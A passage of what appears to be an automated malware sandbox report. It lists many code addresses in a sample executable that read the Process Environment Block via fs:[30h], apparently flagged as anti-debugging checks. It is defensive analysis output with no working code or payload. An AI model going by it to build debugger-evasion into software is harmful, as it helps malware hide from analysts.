                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01970710 mov eax, dword ptr fs:[00000030h]3_2_01970710
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A0710 mov eax, dword ptr fs:[00000030h]3_2_019A0710
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AC700 mov eax, dword ptr fs:[00000030h]3_2_019AC700
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A273C mov eax, dword ptr fs:[00000030h]3_2_019A273C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A273C mov ecx, dword ptr fs:[00000030h]3_2_019A273C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A273C mov eax, dword ptr fs:[00000030h]3_2_019A273C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EC730 mov eax, dword ptr fs:[00000030h]3_2_019EC730
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AC720 mov eax, dword ptr fs:[00000030h]3_2_019AC720
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AC720 mov eax, dword ptr fs:[00000030h]3_2_019AC720
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FE75D mov eax, dword ptr fs:[00000030h]3_2_019FE75D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01970750 mov eax, dword ptr fs:[00000030h]3_2_01970750
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F4755 mov eax, dword ptr fs:[00000030h]3_2_019F4755
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2750 mov eax, dword ptr fs:[00000030h]3_2_019B2750
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2750 mov eax, dword ptr fs:[00000030h]3_2_019B2750
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A674D mov esi, dword ptr fs:[00000030h]3_2_019A674D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A674D mov eax, dword ptr fs:[00000030h]3_2_019A674D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A674D mov eax, dword ptr fs:[00000030h]3_2_019A674D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01978770 mov eax, dword ptr fs:[00000030h]3_2_01978770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01974690 mov eax, dword ptr fs:[00000030h]3_2_01974690
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01974690 mov eax, dword ptr fs:[00000030h]3_2_01974690
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A66B0 mov eax, dword ptr fs:[00000030h]3_2_019A66B0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AC6A6 mov eax, dword ptr fs:[00000030h]3_2_019AC6A6
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AA6C7 mov ebx, dword ptr fs:[00000030h]3_2_019AA6C7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AA6C7 mov eax, dword ptr fs:[00000030h]3_2_019AA6C7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EE6F2 mov eax, dword ptr fs:[00000030h]3_2_019EE6F2
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EE6F2 mov eax, dword ptr fs:[00000030h]3_2_019EE6F2
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EE6F2 mov eax, dword ptr fs:[00000030h]3_2_019EE6F2
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EE6F2 mov eax, dword ptr fs:[00000030h]3_2_019EE6F2
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F06F1 mov eax, dword ptr fs:[00000030h]3_2_019F06F1
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F06F1 mov eax, dword ptr fs:[00000030h]3_2_019F06F1
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2619 mov eax, dword ptr fs:[00000030h]3_2_019B2619
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198260B mov eax, dword ptr fs:[00000030h]3_2_0198260B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198260B mov eax, dword ptr fs:[00000030h]3_2_0198260B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198260B mov eax, dword ptr fs:[00000030h]3_2_0198260B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198260B mov eax, dword ptr fs:[00000030h]3_2_0198260B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198260B mov eax, dword ptr fs:[00000030h]3_2_0198260B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198260B mov eax, dword ptr fs:[00000030h]3_2_0198260B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198260B mov eax, dword ptr fs:[00000030h]3_2_0198260B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EE609 mov eax, dword ptr fs:[00000030h]3_2_019EE609
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A6620 mov eax, dword ptr fs:[00000030h]3_2_019A6620
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A8620 mov eax, dword ptr fs:[00000030h]3_2_019A8620
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197262C mov eax, dword ptr fs:[00000030h]3_2_0197262C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198E627 mov eax, dword ptr fs:[00000030h]3_2_0198E627
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3866E mov eax, dword ptr fs:[00000030h]3_2_01A3866E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3866E mov eax, dword ptr fs:[00000030h]3_2_01A3866E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198C640 mov eax, dword ptr fs:[00000030h]3_2_0198C640
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A2674 mov eax, dword ptr fs:[00000030h]3_2_019A2674
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AA660 mov eax, dword ptr fs:[00000030h]3_2_019AA660
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AA660 mov eax, dword ptr fs:[00000030h]3_2_019AA660
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F89B3 mov esi, dword ptr fs:[00000030h]3_2_019F89B3
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F89B3 mov eax, dword ptr fs:[00000030h]3_2_019F89B3
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F89B3 mov eax, dword ptr fs:[00000030h]3_2_019F89B3
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019829A0 mov eax, dword ptr fs:[00000030h]3_2_019829A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019829A0 mov eax, dword ptr fs:[00000030h]3_2_019829A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019829A0 mov eax, dword ptr fs:[00000030h]3_2_019829A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019829A0 mov eax, dword ptr fs:[00000030h]3_2_019829A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019829A0 mov eax, dword ptr fs:[00000030h]3_2_019829A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019829A0 mov eax, dword ptr fs:[00000030h]3_2_019829A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019829A0 mov eax, dword ptr fs:[00000030h]3_2_019829A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019829A0 mov eax, dword ptr fs:[00000030h]3_2_019829A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019829A0 mov eax, dword ptr fs:[00000030h]3_2_019829A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019829A0 mov eax, dword ptr fs:[00000030h]3_2_019829A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019829A0 mov eax, dword ptr fs:[00000030h]3_2_019829A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019829A0 mov eax, dword ptr fs:[00000030h]3_2_019829A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019829A0 mov eax, dword ptr fs:[00000030h]3_2_019829A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019709AD mov eax, dword ptr fs:[00000030h]3_2_019709AD
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019709AD mov eax, dword ptr fs:[00000030h]3_2_019709AD
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197A9D0 mov eax, dword ptr fs:[00000030h]3_2_0197A9D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197A9D0 mov eax, dword ptr fs:[00000030h]3_2_0197A9D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197A9D0 mov eax, dword ptr fs:[00000030h]3_2_0197A9D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197A9D0 mov eax, dword ptr fs:[00000030h]3_2_0197A9D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197A9D0 mov eax, dword ptr fs:[00000030h]3_2_0197A9D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197A9D0 mov eax, dword ptr fs:[00000030h]3_2_0197A9D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A49D0 mov eax, dword ptr fs:[00000030h]3_2_019A49D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A069C0 mov eax, dword ptr fs:[00000030h]3_2_01A069C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A29F9 mov eax, dword ptr fs:[00000030h]3_2_019A29F9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A29F9 mov eax, dword ptr fs:[00000030h]3_2_019A29F9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3A9D3 mov eax, dword ptr fs:[00000030h]3_2_01A3A9D3
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FE9E0 mov eax, dword ptr fs:[00000030h]3_2_019FE9E0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A0892B mov eax, dword ptr fs:[00000030h]3_2_01A0892B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FC912 mov eax, dword ptr fs:[00000030h]3_2_019FC912
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01968918 mov eax, dword ptr fs:[00000030h]3_2_01968918
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01968918 mov eax, dword ptr fs:[00000030h]3_2_01968918
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EE908 mov eax, dword ptr fs:[00000030h]3_2_019EE908
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EE908 mov eax, dword ptr fs:[00000030h]3_2_019EE908
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F892A mov eax, dword ptr fs:[00000030h]3_2_019F892A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F0946 mov eax, dword ptr fs:[00000030h]3_2_019F0946
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A14978 mov eax, dword ptr fs:[00000030h]3_2_01A14978
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A14978 mov eax, dword ptr fs:[00000030h]3_2_01A14978
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FC97C mov eax, dword ptr fs:[00000030h]3_2_019FC97C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A44940 mov eax, dword ptr fs:[00000030h]3_2_01A44940
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B096E mov eax, dword ptr fs:[00000030h]3_2_019B096E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B096E mov edx, dword ptr fs:[00000030h]3_2_019B096E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B096E mov eax, dword ptr fs:[00000030h]3_2_019B096E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01996962 mov eax, dword ptr fs:[00000030h]3_2_01996962
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01996962 mov eax, dword ptr fs:[00000030h]3_2_01996962
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01996962 mov eax, dword ptr fs:[00000030h]3_2_01996962
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FC89D mov eax, dword ptr fs:[00000030h]3_2_019FC89D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01970887 mov eax, dword ptr fs:[00000030h]3_2_01970887
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3A8E4 mov eax, dword ptr fs:[00000030h]3_2_01A3A8E4
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E8C0 mov eax, dword ptr fs:[00000030h]3_2_0199E8C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AC8F9 mov eax, dword ptr fs:[00000030h]3_2_019AC8F9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AC8F9 mov eax, dword ptr fs:[00000030h]3_2_019AC8F9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A408C0 mov eax, dword ptr fs:[00000030h]3_2_01A408C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FC810 mov eax, dword ptr fs:[00000030h]3_2_019FC810
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1483A mov eax, dword ptr fs:[00000030h]3_2_01A1483A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1483A mov eax, dword ptr fs:[00000030h]3_2_01A1483A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AA830 mov eax, dword ptr fs:[00000030h]3_2_019AA830
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01992835 mov eax, dword ptr fs:[00000030h]3_2_01992835
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01992835 mov eax, dword ptr fs:[00000030h]3_2_01992835
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01992835 mov eax, dword ptr fs:[00000030h]3_2_01992835
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01992835 mov ecx, dword ptr fs:[00000030h]3_2_01992835
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01992835 mov eax, dword ptr fs:[00000030h]3_2_01992835
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01992835 mov eax, dword ptr fs:[00000030h]3_2_01992835
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01974859 mov eax, dword ptr fs:[00000030h]3_2_01974859
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01974859 mov eax, dword ptr fs:[00000030h]3_2_01974859
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A0854 mov eax, dword ptr fs:[00000030h]3_2_019A0854
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A06870 mov eax, dword ptr fs:[00000030h]3_2_01A06870
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A06870 mov eax, dword ptr fs:[00000030h]3_2_01A06870
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01982840 mov ecx, dword ptr fs:[00000030h]3_2_01982840
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FE872 mov eax, dword ptr fs:[00000030h]3_2_019FE872
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FE872 mov eax, dword ptr fs:[00000030h]3_2_019FE872
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A24BB0 mov eax, dword ptr fs:[00000030h]3_2_01A24BB0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A24BB0 mov eax, dword ptr fs:[00000030h]3_2_01A24BB0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980BBE mov eax, dword ptr fs:[00000030h]3_2_01980BBE
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980BBE mov eax, dword ptr fs:[00000030h]3_2_01980BBE
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01990BCB mov eax, dword ptr fs:[00000030h]3_2_01990BCB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01990BCB mov eax, dword ptr fs:[00000030h]3_2_01990BCB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01990BCB mov eax, dword ptr fs:[00000030h]3_2_01990BCB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01970BCD mov eax, dword ptr fs:[00000030h]3_2_01970BCD
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01970BCD mov eax, dword ptr fs:[00000030h]3_2_01970BCD
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01970BCD mov eax, dword ptr fs:[00000030h]3_2_01970BCD
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199EBFC mov eax, dword ptr fs:[00000030h]3_2_0199EBFC
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01978BF0 mov eax, dword ptr fs:[00000030h]3_2_01978BF0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01978BF0 mov eax, dword ptr fs:[00000030h]3_2_01978BF0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01978BF0 mov eax, dword ptr fs:[00000030h]3_2_01978BF0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FCBF0 mov eax, dword ptr fs:[00000030h]3_2_019FCBF0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1EBD0 mov eax, dword ptr fs:[00000030h]3_2_01A1EBD0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EEB1D mov eax, dword ptr fs:[00000030h]3_2_019EEB1D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EEB1D mov eax, dword ptr fs:[00000030h]3_2_019EEB1D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EEB1D mov eax, dword ptr fs:[00000030h]3_2_019EEB1D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EEB1D mov eax, dword ptr fs:[00000030h]3_2_019EEB1D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EEB1D mov eax, dword ptr fs:[00000030h]3_2_019EEB1D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EEB1D mov eax, dword ptr fs:[00000030h]3_2_019EEB1D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EEB1D mov eax, dword ptr fs:[00000030h]3_2_019EEB1D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EEB1D mov eax, dword ptr fs:[00000030h]3_2_019EEB1D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EEB1D mov eax, dword ptr fs:[00000030h]3_2_019EEB1D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A38B28 mov eax, dword ptr fs:[00000030h]3_2_01A38B28
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A38B28 mov eax, dword ptr fs:[00000030h]3_2_01A38B28
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A44B00 mov eax, dword ptr fs:[00000030h]3_2_01A44B00
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199EB20 mov eax, dword ptr fs:[00000030h]3_2_0199EB20
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199EB20 mov eax, dword ptr fs:[00000030h]3_2_0199EB20
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01968B50 mov eax, dword ptr fs:[00000030h]3_2_01968B50
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A06B40 mov eax, dword ptr fs:[00000030h]3_2_01A06B40
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A06B40 mov eax, dword ptr fs:[00000030h]3_2_01A06B40
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3AB40 mov eax, dword ptr fs:[00000030h]3_2_01A3AB40
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A18B42 mov eax, dword ptr fs:[00000030h]3_2_01A18B42
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196CB7E mov eax, dword ptr fs:[00000030h]3_2_0196CB7E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A24B4B mov eax, dword ptr fs:[00000030h]3_2_01A24B4B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A24B4B mov eax, dword ptr fs:[00000030h]3_2_01A24B4B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1EB50 mov eax, dword ptr fs:[00000030h]3_2_01A1EB50
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A42B57 mov eax, dword ptr fs:[00000030h]3_2_01A42B57
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A42B57 mov eax, dword ptr fs:[00000030h]3_2_01A42B57
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A42B57 mov eax, dword ptr fs:[00000030h]3_2_01A42B57
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A42B57 mov eax, dword ptr fs:[00000030h]3_2_01A42B57
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A8A90 mov edx, dword ptr fs:[00000030h]3_2_019A8A90
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197EA80 mov eax, dword ptr fs:[00000030h]3_2_0197EA80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197EA80 mov eax, dword ptr fs:[00000030h]3_2_0197EA80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197EA80 mov eax, dword ptr fs:[00000030h]3_2_0197EA80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197EA80 mov eax, dword ptr fs:[00000030h]3_2_0197EA80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197EA80 mov eax, dword ptr fs:[00000030h]3_2_0197EA80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197EA80 mov eax, dword ptr fs:[00000030h]3_2_0197EA80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197EA80 mov eax, dword ptr fs:[00000030h]3_2_0197EA80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197EA80 mov eax, dword ptr fs:[00000030h]3_2_0197EA80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197EA80 mov eax, dword ptr fs:[00000030h]3_2_0197EA80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A44A80 mov eax, dword ptr fs:[00000030h]3_2_01A44A80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01978AA0 mov eax, dword ptr fs:[00000030h]3_2_01978AA0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01978AA0 mov eax, dword ptr fs:[00000030h]3_2_01978AA0
